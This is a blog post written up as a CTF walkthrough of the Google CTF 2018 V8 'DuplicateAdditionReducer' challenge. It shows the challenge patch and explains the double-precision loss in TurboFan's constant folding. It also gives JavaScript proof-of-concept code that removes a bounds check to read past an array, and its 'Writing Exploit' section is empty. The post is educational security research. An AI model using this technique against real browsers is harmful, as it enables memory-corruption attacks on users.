<!doctype html>
<html lang="en-us">
  <head>
    <title>V8 Challange DuplicateAdditionReducer // Xploiter</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.87.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="John Sherchan" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://xpldotjs.github.io/css/main.min.88e7083eff65effb7485b6e6f38d10afbec25093a6fac42d734ce9024d3defbd.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="V8 Challange DuplicateAdditionReducer"/>
<meta name="twitter:description" content="Introduction Thiis is the challenge from google-ctf-2018. This post heavily rely on this blog post.
Building Challenge V8 mkdir v8 cd v8 fetch v8 cd v8 ./build/install-build-deps.sh git reset --hard dde25872f58951bb0148cf43d6a504ab2f280485 gclient sync git apply ../../attachments/addition-reducer.patch tools/dev/v8gen.py x64.debug ninja -C out.gn/x64.debug Patch Analysis &#43;&#43;&#43; b/src/compiler/duplicate-addition-reducer.cc @@ -0,0 &#43;1,71 @@ &#43;#include &#34;src/compiler/duplicate-addition-reducer.h&#34; &#43; &#43;#include &#34;src/compiler/common-operator.h&#34; &#43;#include &#34;src/compiler/graph.h&#34; &#43;#include &#34;src/compiler/node-properties.h&#34; &#43; &#43;namespace v8 { &#43;namespace internal { &#43;namespace compiler { &#43; &#43;DuplicateAdditionReducer::DuplicateAdditionReducer(Editor* editor, Graph* graph, &#43; CommonOperatorBuilder* common) &#43; : AdvancedReducer(editor), &#43; graph_(graph), common_(common) {} &#43; &#43;Reduction DuplicateAdditionReducer::Reduce(Node* node) { &#43; switch (node-&gt;opcode()) { &#43; case IrOpcode::kNumberAdd: &#43; return ReduceAddition(node); &#43; default: &#43; return NoChange(); &#43; } &#43;} &#43; &#43;Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) { &#43; DCHECK_EQ(node-&gt;op()-&gt;ControlInputCount(), 0); &#43; DCHECK_EQ(node-&gt;op()-&gt;EffectInputCount(), 0); &#43; DCHECK_EQ(node-&gt;op()-&gt;ValueInputCount(), 2); &#43; &#43; Node* left = NodeProperties::GetValueInput(node, 0); &#43; if (left-&gt;opcode() !"/>

    <meta property="og:title" content="V8 Challange DuplicateAdditionReducer" />
<meta property="og:description" content="Introduction Thiis is the challenge from google-ctf-2018. This post heavily rely on this blog post.
Building Challenge V8 mkdir v8 cd v8 fetch v8 cd v8 ./build/install-build-deps.sh git reset --hard dde25872f58951bb0148cf43d6a504ab2f280485 gclient sync git apply ../../attachments/addition-reducer.patch tools/dev/v8gen.py x64.debug ninja -C out.gn/x64.debug Patch Analysis &#43;&#43;&#43; b/src/compiler/duplicate-addition-reducer.cc @@ -0,0 &#43;1,71 @@ &#43;#include &#34;src/compiler/duplicate-addition-reducer.h&#34; &#43; &#43;#include &#34;src/compiler/common-operator.h&#34; &#43;#include &#34;src/compiler/graph.h&#34; &#43;#include &#34;src/compiler/node-properties.h&#34; &#43; &#43;namespace v8 { &#43;namespace internal { &#43;namespace compiler { &#43; &#43;DuplicateAdditionReducer::DuplicateAdditionReducer(Editor* editor, Graph* graph, &#43; CommonOperatorBuilder* common) &#43; : AdvancedReducer(editor), &#43; graph_(graph), common_(common) {} &#43; &#43;Reduction DuplicateAdditionReducer::Reduce(Node* node) { &#43; switch (node-&gt;opcode()) { &#43; case IrOpcode::kNumberAdd: &#43; return ReduceAddition(node); &#43; default: &#43; return NoChange(); &#43; } &#43;} &#43; &#43;Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) { &#43; DCHECK_EQ(node-&gt;op()-&gt;ControlInputCount(), 0); &#43; DCHECK_EQ(node-&gt;op()-&gt;EffectInputCount(), 0); &#43; DCHECK_EQ(node-&gt;op()-&gt;ValueInputCount(), 2); &#43; &#43; Node* left = NodeProperties::GetValueInput(node, 0); &#43; if (left-&gt;opcode() !" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://xpldotjs.github.io/posts/v8-challange-duplicateadditionreducer/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-08-26T00:58:14+05:45" />
<meta property="article:modified_time" content="2021-08-26T00:58:14+05:45" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://xpldotjs.github.io"><img class="app-header-avatar" src="/avatar.jpg" alt="John Sherchan" /></a>
      <h1>Xploiter</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>In love with Browser Exploitation</p>
      <div class="app-header-social">
        
          <a href="https://github.com/xpldotjs" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">V8 Challange DuplicateAdditionReducer</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Aug 26, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          6 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://xpldotjs.github.io/tags/browser/">browser</a>
              <a class="tag" href="https://xpldotjs.github.io/tags/v8/">v8</a>
              <a class="tag" href="https://xpldotjs.github.io/tags/chrome/">chrome</a>
              <a class="tag" href="https://xpldotjs.github.io/tags/v8ctf/">v8ctf</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <h3 id="introduction">Introduction</h3>
<p>Thiis is the challenge from google-ctf-2018. This post heavily rely on this blog <a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">post</a>.</p>
<h4 id="building-challenge-v8">Building Challenge V8</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">mkdir v8
cd v8
fetch v8
cd v8
./build/install-build-deps.sh
git reset --hard dde25872f58951bb0148cf43d6a504ab2f280485
gclient sync
git apply ../../attachments/addition-reducer.patch
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug
</code></pre></div><h4 id="patch-analysis">Patch Analysis</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-diff" data-lang="diff"><span style="color:#a6e22e">+++ b/src/compiler/duplicate-addition-reducer.cc
</span><span style="color:#a6e22e"></span><span style="color:#75715e">@@ -0,0 +1,71 @@
</span><span style="color:#75715e"></span><span style="color:#a6e22e">+#include &#34;src/compiler/duplicate-addition-reducer.h&#34;
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+#include &#34;src/compiler/common-operator.h&#34;
</span><span style="color:#a6e22e">+#include &#34;src/compiler/graph.h&#34;
</span><span style="color:#a6e22e">+#include &#34;src/compiler/node-properties.h&#34;
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+namespace v8 {
</span><span style="color:#a6e22e">+namespace internal {
</span><span style="color:#a6e22e">+namespace compiler {
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+DuplicateAdditionReducer::DuplicateAdditionReducer(Editor* editor, Graph* graph,
</span><span style="color:#a6e22e">+                     CommonOperatorBuilder* common)
</span><span style="color:#a6e22e">+    : AdvancedReducer(editor),
</span><span style="color:#a6e22e">+      graph_(graph), common_(common) {}
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+Reduction DuplicateAdditionReducer::Reduce(Node* node) {
</span><span style="color:#a6e22e">+  switch (node-&gt;opcode()) {
</span><span style="color:#a6e22e">+    case IrOpcode::kNumberAdd:
</span><span style="color:#a6e22e">+      return ReduceAddition(node);
</span><span style="color:#a6e22e">+    default:
</span><span style="color:#a6e22e">+      return NoChange();
</span><span style="color:#a6e22e">+  }
</span><span style="color:#a6e22e">+}
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) {
</span><span style="color:#a6e22e">+  DCHECK_EQ(node-&gt;op()-&gt;ControlInputCount(), 0);
</span><span style="color:#a6e22e">+  DCHECK_EQ(node-&gt;op()-&gt;EffectInputCount(), 0);
</span><span style="color:#a6e22e">+  DCHECK_EQ(node-&gt;op()-&gt;ValueInputCount(), 2);
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+  Node* left = NodeProperties::GetValueInput(node, 0);
</span><span style="color:#a6e22e">+  if (left-&gt;opcode() != node-&gt;opcode()) {
</span><span style="color:#a6e22e">+    return NoChange();
</span><span style="color:#a6e22e">+  }
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+  Node* right = NodeProperties::GetValueInput(node, 1);
</span><span style="color:#a6e22e">+  if (right-&gt;opcode() != IrOpcode::kNumberConstant) {
</span><span style="color:#a6e22e">+    return NoChange();
</span><span style="color:#a6e22e">+  }
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+  Node* parent_left = NodeProperties::GetValueInput(left, 0);
</span><span style="color:#a6e22e">+  Node* parent_right = NodeProperties::GetValueInput(left, 1);
</span><span style="color:#a6e22e">+  if (parent_right-&gt;opcode() != IrOpcode::kNumberConstant) {
</span><span style="color:#a6e22e">+    return NoChange();
</span><span style="color:#a6e22e">+  }
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+  double const1 = OpParameter&lt;double&gt;(right-&gt;op());
</span><span style="color:#a6e22e">+  double const2 = OpParameter&lt;double&gt;(parent_right-&gt;op());
</span><span style="color:#a6e22e">+  Node* new_const = graph()-&gt;NewNode(common()-&gt;NumberConstant(const1+const2));
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+  NodeProperties::ReplaceValueInput(node, parent_left, 0);
</span><span style="color:#a6e22e">+  NodeProperties::ReplaceValueInput(node, new_const, 1);
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+  return Changed(node);
</span><span style="color:#a6e22e">+}
</span><span style="color:#a6e22e">+
</span><span style="color:#a6e22e">+}  // namespace compiler
</span><span style="color:#a6e22e">+}  // namespace internal
</span><span style="color:#a6e22e">+}  // namespace v8
</span><span style="color:#a6e22e"></span>
</code></pre></div><p>Inside the <code>DuplicateAdditionReducer::Reduce</code> function we can see there&rsquo;s a switch statement, if the <code>opcode</code> of the node is <code>kNumberAdd</code> it&rsquo;ll call the <code>ReduceAddition</code> function. At the <code>ReduceAddition</code> function there&rsquo;s a 4 possible code path.</p>
<ol>
<li>It checks if the node at the left input edge of the current node is not equal to current node opcode i.e., <code>kNumberAdd</code>. If it is not equal no changes will be made. else</li>
<li>It&rsquo;ll check if the right input node of the current node not equal to opcode <code>kNumberConstant</code>. If it is not equal no changes will be made. else it&rsquo;ll go to the next if statement.</li>
<li>In the 3rd path, it&rsquo;ll check if the opcode of <code>parent_right</code> node is not equal to <code>kNumberConstant</code>. <code>parent_right</code> node is the right node of (left node of current node). If it is not equal then no changes will me made.</li>
<li>This final path reaches if all the if checkes are passed. At this point compiler knows that the <code>right</code> opcode is <code>kNumberConstant</code> and also the opcode of <code>parent_right</code> is <code>kNumberConstant</code>. So, it&rsquo;ll add the both number constant and make new constant. Then the left node of the current node is replaced with <code>parent_left</code> node and the right node is replaced with the <code>new constant </code> node.</li>
</ol>
<p>Following is the visual representation. This image is taken from <a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/#understanding-the-reduction">@doar-e</a></p>
<p><img src="/posts/static/DoubleAdditionReducer/001-schema_vuln_ctf.png" alt="vuln-schema"></p>
<p>Node Replace:</p>
<p><img src="/posts/static/DoubleAdditionReducer/002-node_replace.png" alt="node-replace"></p>
<p>We can see that the <code>DuplicateAdditionReducer</code> is added in the <code>TypedLoweringPhase</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-diff" data-lang="diff">diff --git a/src/compiler/pipeline.cc b/src/compiler/pipeline.cc
index 5717c70348..8cca161ad5 100644
<span style="color:#f92672">--- a/src/compiler/pipeline.cc
</span><span style="color:#f92672"></span><span style="color:#a6e22e">+++ b/src/compiler/pipeline.cc
</span><span style="color:#a6e22e"></span><span style="color:#75715e">@@ -27,6 +27,7 @@
</span><span style="color:#75715e"></span> #include &#34;src/compiler/constant-folding-reducer.h&#34;
 #include &#34;src/compiler/control-flow-optimizer.h&#34;
 #include &#34;src/compiler/dead-code-elimination.h&#34;
<span style="color:#a6e22e">+#include &#34;src/compiler/duplicate-addition-reducer.h&#34;
</span><span style="color:#a6e22e"></span> #include &#34;src/compiler/effect-control-linearizer.h&#34;
 #include &#34;src/compiler/escape-analysis-reducer.h&#34;
 #include &#34;src/compiler/escape-analysis.h&#34;
<span style="color:#75715e">@@ -1301,6 +1302,8 @@ struct TypedLoweringPhase {
</span><span style="color:#75715e"></span>                                data-&gt;jsgraph()-&gt;Dead());
     DeadCodeElimination dead_code_elimination(&amp;graph_reducer, data-&gt;graph(),
                                               data-&gt;common(), temp_zone);
<span style="color:#a6e22e">+    DuplicateAdditionReducer duplicate_addition_reducer(&amp;graph_reducer, data-&gt;graph(),
</span><span style="color:#a6e22e">+                                              data-&gt;common());
</span><span style="color:#a6e22e"></span>     JSCreateLowering create_lowering(&amp;graph_reducer, data-&gt;dependencies(),
                                      data-&gt;jsgraph(), data-&gt;js_heap_broker(),
                                      data-&gt;native_context(), temp_zone);
<span style="color:#75715e">@@ -1318,6 +1321,7 @@ struct TypedLoweringPhase {
</span><span style="color:#75715e"></span>                                          data-&gt;js_heap_broker(), data-&gt;common(),
                                          data-&gt;machine(), temp_zone);
     AddReducer(data, &amp;graph_reducer, &amp;dead_code_elimination);
<span style="color:#a6e22e">+    AddReducer(data, &amp;graph_reducer, &amp;duplicate_addition_reducer);
</span><span style="color:#a6e22e"></span>     AddReducer(data, &amp;graph_reducer, &amp;create_lowering);
     AddReducer(data, &amp;graph_reducer, &amp;constant_folding_reducer);
     AddReducer(data, &amp;graph_reducer, &amp;typed_optimization);
</code></pre></div><h3 id="the-bug">The Bug</h3>
<p><code>kNumberConstant</code> uses the type of <code>double</code>.The maximum safe integer in JavaScript (2^53 - 1) and <code>Number.MAX_SAFE_INTEGER</code> constant represents it which means in this range the integers are safe to be represented and compared. So as the value grows it looses the precision, (2^53) is where it begins to loose it precision of 1.</p>
<p>In addtion,Double precision uses a total of 64 bits to encode the sign, exponent, and fractional parts. In IEEE 754 doubles, the sign is encoded using 1 bit, the exponent uses 11 bits, and the remaining 52 bits are mantissa (mantissa are the fractional of number). In normal floating point values, the fractional part ranges between 1.0 and 1.111111… up to the limits of precision. This means that the leading digit before the point is always 1, so only the fraction part after the point has to be encoded, in 52 bits. In other words, the fractional part has 53 significant binary digits: the leading digit is implicit, the remaining 52 digits are stored explicitly.</p>
<p><img src="/posts/static/DoubleAdditionReducer/IEEE_754_Double_Floating_Point_Format.png" alt="IEEE_754_DOUBLE_FLOATING_POINT"></p>
<p>For instance, let&rsquo;s see if the there will be loss of precision or not:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#f92672">&gt;</span>   <span style="color:#a6e22e">x</span> <span style="color:#f92672">=</span> Number.<span style="color:#a6e22e">MAX_SAFE_INTEGER</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>
<span style="color:#ae81ff">9007199254740992</span>
<span style="color:#f92672">&gt;</span>   <span style="color:#a6e22e">y</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">x</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>
<span style="color:#ae81ff">9007199254740992</span>
<span style="color:#f92672">&gt;</span>   <span style="color:#a6e22e">z</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">x</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">2</span>
<span style="color:#ae81ff">9007199254740994</span>
<span style="color:#f92672">&gt;</span>   <span style="color:#a6e22e">y</span> <span style="color:#f92672">==</span> <span style="color:#a6e22e">z</span>
<span style="color:#66d9ef">false</span>
</code></pre></div><p>So we can see that the <code>x + 1 + 1</code> is not equal to <code>x + 2</code> which is mathematically wrong and will be problemetic.</p>
<h3 id="writing-poc">Writing POC</h3>
<p>Till now i&rsquo;m pretty much clear about the bug, but writing the POC has been always the hardest for me. In this section, i&rsquo;ll try to write my poc on my own. Let&rsquo;s write the simple code which will trigger the <code>DuplicateAdditionReducer::ReduceAddition</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-JS" data-lang="JS"><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">trigger</span>(<span style="color:#a6e22e">x</span>) {
    <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">y</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">x</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;bug&#34;</span> <span style="color:#f92672">?</span> <span style="color:#ae81ff">2.2</span> <span style="color:#f92672">:</span> <span style="color:#ae81ff">4.4</span>)
    <span style="color:#a6e22e">y</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">y</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>;
    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">y</span>;
}
<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">trigger</span>(<span style="color:#e6db74">&#34;bug&#34;</span>));
<span style="color:#f92672">%</span><span style="color:#a6e22e">OptimizeFunctionOnNextCall</span>(<span style="color:#a6e22e">trigger</span>);
<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">trigger</span>(<span style="color:#e6db74">&#34;bug&#34;</span>));
</code></pre></div><p>The <code>if</code> statement in the above code is to make <code>phi</code> node, because if the arithmetic expression is <code>2.2 + 1 + 1</code> it&rsquo;ll directly get optimized for the constant in <code>TypedLoweringPhase</code> using <code>ConstantFoldingReducer</code>. Also the <code>NumberAdd</code> appears only if two numeric types  are different i.e, <code>1.1 + 1</code>.
As we can see in the following image we can see that the <code>const1</code> is <code>1</code> and <code>const2</code> is <code>1</code>, which is <code>1 + 1</code> from the above code. At line no <code>61</code> it&rsquo;ll get added and create a new <code>const_node</code>.</p>
<p><img src="/posts/static/DoubleAdditionReducer/003-trigger-001.png" alt="001-trigger"></p>
<p>Now let&rsquo;s build the POC using the precision loss fault.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-JS" data-lang="JS"><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">trigger</span>(<span style="color:#a6e22e">x</span>) {
	<span style="color:#66d9ef">const</span> <span style="color:#a6e22e">arr</span> <span style="color:#f92672">=</span> [<span style="color:#ae81ff">1.1</span>, <span style="color:#ae81ff">1.2</span>, <span style="color:#ae81ff">1.3</span>, <span style="color:#ae81ff">1.4</span>, <span style="color:#ae81ff">1.5</span>]
	<span style="color:#66d9ef">let</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">x</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;bug&#34;</span> <span style="color:#f92672">?</span> <span style="color:#ae81ff">9007199254740992</span> <span style="color:#f92672">:</span> <span style="color:#ae81ff">9007199254740989</span>);
	<span style="color:#a6e22e">idx</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">idx</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>;
	<span style="color:#a6e22e">idx</span> <span style="color:#f92672">-=</span> <span style="color:#ae81ff">9007199254740989</span>;
	<span style="color:#66d9ef">return</span> <span style="color:#a6e22e">arr</span>[<span style="color:#a6e22e">idx</span>];
}

<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">trigger</span>(<span style="color:#e6db74">&#34;bug&#34;</span>));
<span style="color:#f92672">%</span><span style="color:#a6e22e">OptimizeFunctionOnNextCall</span>(<span style="color:#a6e22e">trigger</span>);
<span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">trigger</span>(<span style="color:#e6db74">&#34;bug&#34;</span>));
</code></pre></div><p>In the <code>TyperPhase</code> CheckBounds is generated with tyep Range(2,3).</p>
<p><img src="/posts/static/DoubleAdditionReducer/004-typer.png" alt="002-typer"></p>
<p>Here in escape analysis phase, after the LoadElimination the <code>LoadField</code> is replaced by <code>NumberConstant</code> with <code>Range(5,5)</code> which is the length of an array.
<img src="/posts/static/DoubleAdditionReducer/007-escape-analysis.png" alt="002-escape-analysis"></p>
<p>Now we can see that the <code>CheckBounds</code> is eliminate in the <code>Simplified Lowering</code> phase.
<img src="/posts/static/DoubleAdditionReducer/005-simplified-lowering.png" alt="003-simplified-lowering"></p>
<p>This is the code that is responsible for elemination of <code>CheckBounds</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-C++" data-lang="C++">  <span style="color:#66d9ef">void</span> <span style="color:#a6e22e">VisitCheckBounds</span>(Node<span style="color:#f92672">*</span> node, SimplifiedLowering<span style="color:#f92672">*</span> lowering) {
    CheckParameters <span style="color:#66d9ef">const</span><span style="color:#f92672">&amp;</span> p <span style="color:#f92672">=</span> CheckParametersOf(node<span style="color:#f92672">-&gt;</span>op());
    Type <span style="color:#66d9ef">const</span> index_type <span style="color:#f92672">=</span> TypeOf(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>)); 
    Type <span style="color:#66d9ef">const</span> length_type <span style="color:#f92672">=</span> TypeOf(node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">1</span>));
    <span style="color:#66d9ef">if</span> (length_type.Is(Type<span style="color:#f92672">::</span>Unsigned31())) {
      <span style="color:#66d9ef">if</span> (index_type.Is(Type<span style="color:#f92672">::</span>Integral32OrMinusZero())) {
        <span style="color:#75715e">// Map -0 to 0, and the values in the [-2^31,-1] range to the
</span><span style="color:#75715e"></span>        <span style="color:#75715e">// [2^31,2^32-1] range, which will be considered out-of-bounds
</span><span style="color:#75715e"></span>        <span style="color:#75715e">// as well, because the {length_type} is limited to Unsigned31.
</span><span style="color:#75715e"></span>        VisitBinop(node, UseInfo<span style="color:#f92672">::</span>TruncatingWord32(),
                   MachineRepresentation<span style="color:#f92672">::</span>kWord32);
        <span style="color:#66d9ef">if</span> (lower()) {
<span style="display:block;width:100%;background-color:#3c3d38">            <span style="color:#75715e">// index_type.Min() = 2;    2 &gt; 0.0 = ture
</span></span><span style="display:block;width:100%;background-color:#3c3d38"><span style="color:#75715e"></span>            <span style="color:#75715e">// index_type.Max() = 3;    3 &lt; length_type.Min() = true
</span></span><span style="display:block;width:100%;background-color:#3c3d38"><span style="color:#75715e"></span>            <span style="color:#75715e">// length_type.Min() = 5;   
</span></span><span style="color:#75715e"></span>          <span style="color:#66d9ef">if</span> (lowering<span style="color:#f92672">-&gt;</span>poisoning_level_ <span style="color:#f92672">==</span>
                  PoisoningMitigationLevel<span style="color:#f92672">::</span>kDontPoison <span style="color:#f92672">&amp;&amp;</span>
              (index_type.IsNone() <span style="color:#f92672">||</span> length_type.IsNone() <span style="color:#f92672">||</span>
               (index_type.Min() <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">0.0</span> <span style="color:#f92672">&amp;&amp;</span>                      
                index_type.Max() <span style="color:#f92672">&lt;</span> length_type.Min()))) {
            <span style="color:#75715e">// The bounds check is redundant if we already know that
</span><span style="color:#75715e"></span>            <span style="color:#75715e">// the index is within the bounds of [0.0, length[.
</span><span style="color:#75715e"></span>        
            <span style="color:#75715e">// This will remove the checkbound
</span><span style="display:block;width:100%;background-color:#3c3d38"><span style="color:#75715e"></span>            DeferReplacement(node, node<span style="color:#f92672">-&gt;</span>InputAt(<span style="color:#ae81ff">0</span>));
</span>          } <span style="color:#66d9ef">else</span> {
            NodeProperties<span style="color:#f92672">::</span>ChangeOp(
                node, simplified()<span style="color:#f92672">-&gt;</span>CheckedUint32Bounds(p.feedback()));
          }
        }
      }
      <span style="color:#75715e">// [...]
</span><span style="color:#75715e"></span>  }
</code></pre></div><p>Inside gdb:</p>
<p><img src="/posts/static/DoubleAdditionReducer/008-type.png" alt="004-type">
<img src="/posts/static/DoubleAdditionReducer/009-escape-debug.png" alt="004-dbg"></p>
<p>As we can see below we have a leak.
<img src="/posts/static/DoubleAdditionReducer/006-oob.png" alt="006-output"></p>
<h2 id="writing-exploit">Writing Exploit</h2>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
